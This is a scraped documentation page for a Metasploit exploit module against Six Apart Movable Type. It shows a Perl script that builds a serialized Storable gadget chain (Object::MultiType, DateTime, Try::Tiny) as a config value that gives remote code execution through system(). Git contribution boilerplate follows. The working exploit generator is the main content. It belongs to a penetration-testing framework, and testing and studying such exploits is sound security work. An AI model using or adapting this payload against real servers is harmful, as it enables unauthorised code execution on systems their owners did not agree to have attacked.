metasploit-framework

https://github.com/rapid7/metasploit-framework

Ruby

Metasploit Framework

MetasploitModule#exploit_nondestructive

#!/usr/bin/perl

# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.

use Storable;

{
    package Object::MultiType;
    use overload '+' => sub { 'ingored' };
}

{
    package Object::MultiType::Saver;
}

{
    package DateTime;
    use overload '+' => sub { 'ingored' };
}

{
    package Try::Tiny::ScopeGuard;
}

my $try_tiny_loader = bless {}, 'DateTime';
my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';

my $data = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";

Source | Google | Stack overflow

Edit

git clone [email protected]:rapid7/metasploit-framework.git

cd metasploit-framework

open modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb

Contribute

# Make a new branch

git checkout -b -your-name--update-docs-MetasploitModule-exploit_nondestructive-for-pr

# Commit to git

git add modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rbgit commit -m "better docs for MetasploitModule#exploit_nondestructive"

# Open pull request

gem install hub # on a mac you can `brew install hub`

hub fork

git push <your name> -your-name--update-docs-MetasploitModule-exploit_nondestructive-for-pr

hub pull-request

# Celebrate!